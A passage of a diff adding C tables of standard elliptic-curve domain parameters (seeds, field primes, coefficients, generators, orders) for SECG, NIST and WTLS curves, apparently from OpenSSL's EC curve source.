+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07,
+        /* x */
+        0x00, 0x3B, 0x4C, 0x38, 0x2C, 0xE3, 0x7A, 0xA1, 0x92, 0xA4, 0x01, 0x9E,
+        0x76, 0x30, 0x36, 0xF4, 0xF5, 0xDD, 0x4D, 0x7E, 0xBB,
+        /* y */
+        0x00, 0x93, 0x8c, 0xf9, 0x35, 0x31, 0x8f, 0xdc, 0xed, 0x6b, 0xc2, 0x82,
+        0x86, 0x53, 0x17, 0x33, 0xc3, 0xf0, 0x3c, 0x4f, 0xee,
+        /* order */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xB8,
+        0xFA, 0x16, 0xDF, 0xAB, 0x9A, 0xCA, 0x16, 0xB6, 0xB3
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 21 * 6];
+} _EC_SECG_PRIME_160R1 = {
+    {
+        NID_X9_62_prime_field, 20, 21, 1
+    },
+    {
+        /* seed */
+        0x10, 0x53, 0xCD, 0xE4, 0x2C, 0x14, 0xD6, 0x96, 0xE6, 0x76, 0x87, 0x56,
+        0x15, 0x17, 0x53, 0x3B, 0xF3, 0xF8, 0x33, 0x45,
+        /* p */
+        0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x7F, 0xFF, 0xFF, 0xFF,
+        /* a */
+        0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x7F, 0xFF, 0xFF, 0xFC,
+        /* b */
+        0x00, 0x1C, 0x97, 0xBE, 0xFC, 0x54, 0xBD, 0x7A, 0x8B, 0x65, 0xAC, 0xF8,
+        0x9F, 0x81, 0xD4, 0xD4, 0xAD, 0xC5, 0x65, 0xFA, 0x45,
+        /* x */
+        0x00, 0x4A, 0x96, 0xB5, 0x68, 0x8E, 0xF5, 0x73, 0x28, 0x46, 0x64, 0x69,
+        0x89, 0x68, 0xC3, 0x8B, 0xB9, 0x13, 0xCB, 0xFC, 0x82,
+        /* y */
+        0x00, 0x23, 0xa6, 0x28, 0x55, 0x31, 0x68, 0x94, 0x7d, 0x59, 0xdc, 0xc9,
+        0x12, 0x04, 0x23, 0x51, 0x37, 0x7a, 0xc5, 0xfb, 0x32,
+        /* order */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xF4,
+        0xC8, 0xF9, 0x27, 0xAE, 0xD3, 0xCA, 0x75, 0x22, 0x57
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 21 * 6];
+} _EC_SECG_PRIME_160R2 = {
+    {
+        NID_X9_62_prime_field, 20, 21, 1
+    },
+    {
+        /* seed */
+        0xB9, 0x9B, 0x99, 0xB0, 0x99, 0xB3, 0x23, 0xE0, 0x27, 0x09, 0xA4, 0xD6,
+        0x96, 0xE6, 0x76, 0x87, 0x56, 0x15, 0x17, 0x51,
+        /* p */
+        0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xAC, 0x73,
+        /* a */
+        0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xAC, 0x70,
+        /* b */
+        0x00, 0xB4, 0xE1, 0x34, 0xD3, 0xFB, 0x59, 0xEB, 0x8B, 0xAB, 0x57, 0x27,
+        0x49, 0x04, 0x66, 0x4D, 0x5A, 0xF5, 0x03, 0x88, 0xBA,
+        /* x */
+        0x00, 0x52, 0xDC, 0xB0, 0x34, 0x29, 0x3A, 0x11, 0x7E, 0x1F, 0x4F, 0xF1,
+        0x1B, 0x30, 0xF7, 0x19, 0x9D, 0x31, 0x44, 0xCE, 0x6D,
+        /* y */
+        0x00, 0xfe, 0xaf, 0xfe, 0xf2, 0xe3, 0x31, 0xf2, 0x96, 0xe0, 0x71, 0xfa,
+        0x0d, 0xf9, 0x98, 0x2c, 0xfe, 0xa7, 0xd4, 0x3f, 0x2e,
+        /* order */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x35,
+        0x1E, 0xE7, 0x86, 0xA8, 0x18, 0xF3, 0xA1, 0xA1, 0x6B
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 24 * 6];
+} _EC_SECG_PRIME_192K1 = {
+    {
+        NID_X9_62_prime_field, 0, 24, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xEE, 0x37,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03,
+        /* x */
+        0xDB, 0x4F, 0xF1, 0x0E, 0xC0, 0x57, 0xE9, 0xAE, 0x26, 0xB0, 0x7D, 0x02,
+        0x80, 0xB7, 0xF4, 0x34, 0x1D, 0xA5, 0xD1, 0xB1, 0xEA, 0xE0, 0x6C, 0x7D,
+        /* y */
+        0x9b, 0x2f, 0x2f, 0x6d, 0x9c, 0x56, 0x28, 0xa7, 0x84, 0x41, 0x63, 0xd0,
+        0x15, 0xbe, 0x86, 0x34, 0x40, 0x82, 0xaa, 0x88, 0xd9, 0x5e, 0x2f, 0x9d,
+        /* order */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFE,
+        0x26, 0xF2, 0xFC, 0x17, 0x0F, 0x69, 0x46, 0x6A, 0x74, 0xDE, 0xFD, 0x8D
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 29 * 6];
+} _EC_SECG_PRIME_224K1 = {
+    {
+        NID_X9_62_prime_field, 0, 29, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFE, 0xFF, 0xFF, 0xE5, 0x6D,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x05,
+        /* x */
+        0x00, 0xA1, 0x45, 0x5B, 0x33, 0x4D, 0xF0, 0x99, 0xDF, 0x30, 0xFC, 0x28,
+        0xA1, 0x69, 0xA4, 0x67, 0xE9, 0xE4, 0x70, 0x75, 0xA9, 0x0F, 0x7E, 0x65,
+        0x0E, 0xB6, 0xB7, 0xA4, 0x5C,
+        /* y */
+        0x00, 0x7e, 0x08, 0x9f, 0xed, 0x7f, 0xba, 0x34, 0x42, 0x82, 0xca, 0xfb,
+        0xd6, 0xf7, 0xe3, 0x19, 0xf7, 0xc0, 0xb0, 0xbd, 0x59, 0xe2, 0xca, 0x4b,
+        0xdb, 0x55, 0x6d, 0x61, 0xa5,
+        /* order */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x01, 0xDC, 0xE8, 0xD2, 0xEC, 0x61, 0x84, 0xCA, 0xF0, 0xA9,
+        0x71, 0x76, 0x9F, 0xB1, 0xF7
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 32 * 6];
+} _EC_SECG_PRIME_256K1 = {
+    {
+        NID_X9_62_prime_field, 0, 32, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xFC, 0x2F,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07,
+        /* x */
+        0x79, 0xBE, 0x66, 0x7E, 0xF9, 0xDC, 0xBB, 0xAC, 0x55, 0xA0, 0x62, 0x95,
+        0xCE, 0x87, 0x0B, 0x07, 0x02, 0x9B, 0xFC, 0xDB, 0x2D, 0xCE, 0x28, 0xD9,
+        0x59, 0xF2, 0x81, 0x5B, 0x16, 0xF8, 0x17, 0x98,
+        /* y */
+        0x48, 0x3a, 0xda, 0x77, 0x26, 0xa3, 0xc4, 0x65, 0x5d, 0xa4, 0xfb, 0xfc,
+        0x0e, 0x11, 0x08, 0xa8, 0xfd, 0x17, 0xb4, 0x48, 0xa6, 0x85, 0x54, 0x19,
+        0x9c, 0x47, 0xd0, 0x8f, 0xfb, 0x10, 0xd4, 0xb8,
+        /* order */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFE, 0xBA, 0xAE, 0xDC, 0xE6, 0xAF, 0x48, 0xA0, 0x3B,
+        0xBF, 0xD2, 0x5E, 0x8C, 0xD0, 0x36, 0x41, 0x41
+    }
+};
+
+/* some wap/wtls curves */
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 15 * 6];
+} _EC_WTLS_8 = {
+    {
+        NID_X9_62_prime_field, 0, 15, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFD, 0xE7,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x03,
+        /* x */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x01,
+        /* y */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x02,
+        /* order */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xEC, 0xEA, 0x55, 0x1A,
+        0xD8, 0x37, 0xE9
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 21 * 6];
+} _EC_WTLS_9 = {
+    {
+        NID_X9_62_prime_field, 0, 21, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC, 0x80, 0x8F,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03,
+        /* x */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* y */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
+        /* order */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xCD,
+        0xC9, 0x8A, 0xE0, 0xE2, 0xDE, 0x57, 0x4A, 0xBF, 0x33
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 28 * 6];
+} _EC_WTLS_12 = {
+    {
+        NID_X9_62_prime_field, 0, 28, 1
+    },
+    {
+        /* no seed */
+        /* p */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFE,
+        /* b */
+        0xB4, 0x05, 0x0A, 0x85, 0x0C, 0x04, 0xB3, 0xAB, 0xF5, 0x41, 0x32, 0x56,
+        0x50, 0x44, 0xB0, 0xB7, 0xD7, 0xBF, 0xD8, 0xBA, 0x27, 0x0B, 0x39, 0x43,
+        0x23, 0x55, 0xFF, 0xB4,
+        /* x */
+        0xB7, 0x0E, 0x0C, 0xBD, 0x6B, 0xB4, 0xBF, 0x7F, 0x32, 0x13, 0x90, 0xB9,
+        0x4A, 0x03, 0xC1, 0xD3, 0x56, 0xC2, 0x11, 0x22, 0x34, 0x32, 0x80, 0xD6,
+        0x11, 0x5C, 0x1D, 0x21,
+        /* y */
+        0xbd, 0x37, 0x63, 0x88, 0xb5, 0xf7, 0x23, 0xfb, 0x4c, 0x22, 0xdf, 0xe6,
+        0xcd, 0x43, 0x75, 0xa0, 0x5a, 0x07, 0x47, 0x64, 0x44, 0xd5, 0x81, 0x99,
+        0x85, 0x00, 0x7e, 0x34,
+        /* order */
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0x16, 0xA2, 0xE0, 0xB8, 0xF0, 0x3E, 0x13, 0xDD, 0x29, 0x45,
+        0x5C, 0x5C, 0x2A, 0x3D
+    }
+};
+
+#ifndef OPENSSL_NO_EC2M
+
+/* characteristic two curves */
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 15 * 6];
+} _EC_SECG_CHAR2_113R1 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 15, 2
+    },
+    {
+        /* seed */
+        0x10, 0xE7, 0x23, 0xAB, 0x14, 0xD6, 0x96, 0xE6, 0x76, 0x87, 0x56, 0x15,
+        0x17, 0x56, 0xFE, 0xBF, 0x8F, 0xCB, 0x49, 0xA9,
+        /* p */
+        0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x02, 0x01,
+        /* a */
+        0x00, 0x30, 0x88, 0x25, 0x0C, 0xA6, 0xE7, 0xC7, 0xFE, 0x64, 0x9C, 0xE8,
+        0x58, 0x20, 0xF7,
+        /* b */
+        0x00, 0xE8, 0xBE, 0xE4, 0xD3, 0xE2, 0x26, 0x07, 0x44, 0x18, 0x8B, 0xE0,
+        0xE9, 0xC7, 0x23,
+        /* x */
+        0x00, 0x9D, 0x73, 0x61, 0x6F, 0x35, 0xF4, 0xAB, 0x14, 0x07, 0xD7, 0x35,
+        0x62, 0xC1, 0x0F,
+        /* y */
+        0x00, 0xA5, 0x28, 0x30, 0x27, 0x79, 0x58, 0xEE, 0x84, 0xD1, 0x31, 0x5E,
+        0xD3, 0x18, 0x86,
+        /* order */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD9, 0xCC, 0xEC, 0x8A,
+        0x39, 0xE5, 0x6F
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 15 * 6];
+} _EC_SECG_CHAR2_113R2 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 15, 2
+    },
+    {
+        /* seed */
+        0x10, 0xC0, 0xFB, 0x15, 0x76, 0x08, 0x60, 0xDE, 0xF1, 0xEE, 0xF4, 0xD6,
+        0x96, 0xE6, 0x76, 0x87, 0x56, 0x15, 0x17, 0x5D,
+        /* p */
+        0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x02, 0x01,
+        /* a */
+        0x00, 0x68, 0x99, 0x18, 0xDB, 0xEC, 0x7E, 0x5A, 0x0D, 0xD6, 0xDF, 0xC0,
+        0xAA, 0x55, 0xC7,
+        /* b */
+        0x00, 0x95, 0xE9, 0xA9, 0xEC, 0x9B, 0x29, 0x7B, 0xD4, 0xBF, 0x36, 0xE0,
+        0x59, 0x18, 0x4F,
+        /* x */
+        0x01, 0xA5, 0x7A, 0x6A, 0x7B, 0x26, 0xCA, 0x5E, 0xF5, 0x2F, 0xCD, 0xB8,
+        0x16, 0x47, 0x97,
+        /* y */
+        0x00, 0xB3, 0xAD, 0xC9, 0x4E, 0xD1, 0xFE, 0x67, 0x4C, 0x06, 0xE6, 0x95,
+        0xBA, 0xBA, 0x1D,
+        /* order */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x08, 0x78, 0x9B, 0x24,
+        0x96, 0xAF, 0x93
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 17 * 6];
+} _EC_SECG_CHAR2_131R1 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 17, 2
+    },
+    {
+        /* seed */
+        0x4D, 0x69, 0x6E, 0x67, 0x68, 0x75, 0x61, 0x51, 0x75, 0x98, 0x5B, 0xD3,
+        0xAD, 0xBA, 0xDA, 0x21, 0xB4, 0x3A, 0x97, 0xE2,
+        /* p */
+        0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x01, 0x0D,
+        /* a */
+        0x07, 0xA1, 0x1B, 0x09, 0xA7, 0x6B, 0x56, 0x21, 0x44, 0x41, 0x8F, 0xF3,
+        0xFF, 0x8C, 0x25, 0x70, 0xB8,
+        /* b */
+        0x02, 0x17, 0xC0, 0x56, 0x10, 0x88, 0x4B, 0x63, 0xB9, 0xC6, 0xC7, 0x29,
+        0x16, 0x78, 0xF9, 0xD3, 0x41,
+        /* x */
+        0x00, 0x81, 0xBA, 0xF9, 0x1F, 0xDF, 0x98, 0x33, 0xC4, 0x0F, 0x9C, 0x18,
+        0x13, 0x43, 0x63, 0x83, 0x99,
+        /* y */
+        0x07, 0x8C, 0x6E, 0x7E, 0xA3, 0x8C, 0x00, 0x1F, 0x73, 0xC8, 0x13, 0x4B,
+        0x1B, 0x4E, 0xF9, 0xE1, 0x50,
+        /* order */
+        0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x31, 0x23, 0x95,
+        0x3A, 0x94, 0x64, 0xB5, 0x4D
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 17 * 6];
+} _EC_SECG_CHAR2_131R2 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 17, 2
+    },
+    {
+        /* seed */
+        0x98, 0x5B, 0xD3, 0xAD, 0xBA, 0xD4, 0xD6, 0x96, 0xE6, 0x76, 0x87, 0x56,
+        0x15, 0x17, 0x5A, 0x21, 0xB4, 0x3A, 0x97, 0xE3,
+        /* p */
+        0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x01, 0x0D,
+        /* a */
+        0x03, 0xE5, 0xA8, 0x89, 0x19, 0xD7, 0xCA, 0xFC, 0xBF, 0x41, 0x5F, 0x07,
+        0xC2, 0x17, 0x65, 0x73, 0xB2,
+        /* b */
+        0x04, 0xB8, 0x26, 0x6A, 0x46, 0xC5, 0x56, 0x57, 0xAC, 0x73, 0x4C, 0xE3,
+        0x8F, 0x01, 0x8F, 0x21, 0x92,
+        /* x */
+        0x03, 0x56, 0xDC, 0xD8, 0xF2, 0xF9, 0x50, 0x31, 0xAD, 0x65, 0x2D, 0x23,
+        0x95, 0x1B, 0xB3, 0x66, 0xA8,
+        /* y */
+        0x06, 0x48, 0xF0, 0x6D, 0x86, 0x79, 0x40, 0xA5, 0x36, 0x6D, 0x9E, 0x26,
+        0x5D, 0xE9, 0xEB, 0x24, 0x0F,
+        /* order */
+        0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x69, 0x54, 0xA2,
+        0x33, 0x04, 0x9B, 0xA9, 0x8F
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 21 * 6];
+} _EC_NIST_CHAR2_163K = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 21, 2
+    },
+    {
+        /* no seed */
+        /* p */
+        0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC9,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* x */
+        0x02, 0xFE, 0x13, 0xC0, 0x53, 0x7B, 0xBC, 0x11, 0xAC, 0xAA, 0x07, 0xD7,
+        0x93, 0xDE, 0x4E, 0x6D, 0x5E, 0x5C, 0x94, 0xEE, 0xE8,
+        /* y */
+        0x02, 0x89, 0x07, 0x0F, 0xB0, 0x5D, 0x38, 0xFF, 0x58, 0x32, 0x1F, 0x2E,
+        0x80, 0x05, 0x36, 0xD5, 0x38, 0xCC, 0xDA, 0xA3, 0xD9,
+        /* order */
+        0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x01,
+        0x08, 0xA2, 0xE0, 0xCC, 0x0D, 0x99, 0xF8, 0xA5, 0xEF
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 21 * 6];
+} _EC_SECG_CHAR2_163R1 = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 21, 2
+    },
+    {
+        /* no seed */
+# if 0
+        /*
+        * The algorithm used to derive the curve parameters from the seed
+        * used here is slightly different than the algorithm described in
+        * X9.62 .
+        */
+        0x24, 0xB7, 0xB1, 0x37, 0xC8, 0xA1, 0x4D, 0x69, 0x6E, 0x67, 0x68, 0x75,
+        0x61, 0x51, 0x75, 0x6F, 0xD0, 0xDA, 0x2E, 0x5C,
+# endif
+        /* p */
+        0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC9,
+        /* a */
+        0x07, 0xB6, 0x88, 0x2C, 0xAA, 0xEF, 0xA8, 0x4F, 0x95, 0x54, 0xFF, 0x84,
+        0x28, 0xBD, 0x88, 0xE2, 0x46, 0xD2, 0x78, 0x2A, 0xE2,
+        /* b */
+        0x07, 0x13, 0x61, 0x2D, 0xCD, 0xDC, 0xB4, 0x0A, 0xAB, 0x94, 0x6B, 0xDA,
+        0x29, 0xCA, 0x91, 0xF7, 0x3A, 0xF9, 0x58, 0xAF, 0xD9,
+        /* x */
+        0x03, 0x69, 0x97, 0x96, 0x97, 0xAB, 0x43, 0x89, 0x77, 0x89, 0x56, 0x67,
+        0x89, 0x56, 0x7F, 0x78, 0x7A, 0x78, 0x76, 0xA6, 0x54,
+        /* y */
+        0x00, 0x43, 0x5E, 0xDB, 0x42, 0xEF, 0xAF, 0xB2, 0x98, 0x9D, 0x51, 0xFE,
+        0xFC, 0xE3, 0xC8, 0x09, 0x88, 0xF4, 0x1F, 0xF8, 0x83,
+        /* order */
+        0x03, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x48,
+        0xAA, 0xB6, 0x89, 0xC2, 0x9C, 0xA7, 0x10, 0x27, 0x9B
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 21 * 6];
+} _EC_NIST_CHAR2_163B = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 21, 2
+    },
+    {
+        /* no seed */
+# if 0
+        /*
+        * The seed here was used to created the curve parameters in normal
+        * basis representation (and not the polynomial representation used
+        * here)
+        */
+        0x85, 0xE2, 0x5B, 0xFE, 0x5C, 0x86, 0x22, 0x6C, 0xDB, 0x12, 0x01, 0x6F,
+        0x75, 0x53, 0xF9, 0xD0, 0xE6, 0x93, 0xA2, 0x68,
+# endif
+        /* p */
+        0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC9,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* b */
+        0x02, 0x0A, 0x60, 0x19, 0x07, 0xB8, 0xC9, 0x53, 0xCA, 0x14, 0x81, 0xEB,
+        0x10, 0x51, 0x2F, 0x78, 0x74, 0x4A, 0x32, 0x05, 0xFD,
+        /* x */
+        0x03, 0xF0, 0xEB, 0xA1, 0x62, 0x86, 0xA2, 0xD5, 0x7E, 0xA0, 0x99, 0x11,
+        0x68, 0xD4, 0x99, 0x46, 0x37, 0xE8, 0x34, 0x3E, 0x36,
+        /* y */
+        0x00, 0xD5, 0x1F, 0xBC, 0x6C, 0x71, 0xA0, 0x09, 0x4F, 0xA2, 0xCD, 0xD5,
+        0x45, 0xB1, 0x1C, 0x5C, 0x0C, 0x79, 0x73, 0x24, 0xF1,
+        /* order */
+        0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x92,
+        0xFE, 0x77, 0xE7, 0x0C, 0x12, 0xA4, 0x23, 0x4C, 0x33
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 25 * 6];
+} _EC_SECG_CHAR2_193R1 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 25, 2
+    },
+    {
+        /* seed */
